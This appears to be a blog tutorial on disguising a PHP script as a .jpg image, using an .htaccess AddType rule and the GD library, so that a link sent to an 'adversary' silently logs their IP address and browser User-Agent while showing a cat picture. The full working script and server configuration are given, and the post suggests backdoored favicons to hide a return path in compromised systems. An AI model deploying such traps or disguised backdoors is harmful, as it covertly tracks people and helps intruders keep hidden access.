Traps for your opponent ? php scripts in images !

Tactics, Techniques and Procedures.
Tactics, Techniques and Procedures.

It is more important to be smarter than the enemy than more powerful.

_Sun Tzu

Hello, my name is Regis and today I’ll talk about how I play with php scripts in images, notice throughout the article that the same technique can be used for several other types of file extensions and the limitation here is the author’s knowledge and creativity.
First let’s talk about why this is possible,

According to the php manual, php is not limited to creating HTML output only.
It can also be used to create and manipulate image files in various formats such as gif, png, jpg, etc.
Thanks to a library called GD of function images.

So all we need to know is if this library is installed on our server, I use a Debian Linux server, with apache
running for the simulation, type the command below to check the library:

0uts1d3r@C&C:/var/www/html$ php -r “print_r(get_loaded_extensions());” | grep -i gd

Or if you prefer I’ve created a quick php script that will give you this answer:

<?php
$ext = get_loaded_extensions();

if (in_array(“gd”, $ext)){
echo “GD installed !\n”;
}else{
echo “GD no installed !\n”;
}
?>

If the GD library is not installed on your server you can follow the tutorial below for installation:
https://www.php.net/manual/en/image.installation.php

From here we will prepare our weapons, first create a php script with the malicious code, the script must have the extension
like .jpg, then we’ll understand why.

Create a simple php script, which is designed to capture the ip of the opponent’s ISP is the browser’s User-agent:

<?php
$ip = $_SERVER[‘REMOTE_ADDR’];
$agnt = $_SERVER[‘HTTP_USER_AGENT’];
$a = fopen(‘./ip_list.txt’, ‘a+’);
$b = “[*] Ip: “.$ip.” ==> User-Agent: “.$agnt.”\n”;
fwrite($a, $b);
fclose($a);

Then I trigger the function imagecreatefrompng(); from php-gd to generate an image from the cat2.png image as soon as the
cat.jpg (php script) file is opened:

$im = imagecreatefrompng(‘cat2.png’);
header(‘Content-type: image/png’);
imagejpeg($im);
imagedestroy($im);
?>

Now that we have the malicious script ready we should get the image file cat2.png :

0uts1d3r@C&C:/var/www/html$ wget https://miro.medium.com/max/2610/1*U6PHGJLYZFIfbfsmDAxosA.png -O cat2.png

All we need now is to get the server under our control to run files with the .jpg extension as a .php file
and for that I use the .htaccess configuration file:

0uts1d3r@C&C:/var/www/html$ pico .htaccess

AddType application/x-httpd-php .jpg

Notice that I use the AddType property to set the PHP MIME type. (Note: The “AddHandler” will also work).

Once we have our trap configured just send the link to the adversary and when it is accessed we will have the data
of the same:

And if he suspects it, he decides to view the source code by adding the “view-source:” in his browser:

If he doesn’t know the GD library and what it’s capable of, he won’t suspect the data extraction.
Imagine using this technique to generate favicons with backdoors, that would be useful to mask his means of return in a
compromised environment.

That’s all, the next time you receive a link from anyone create the habit of viewing it through a proxy server before leaving by accessing third party environments.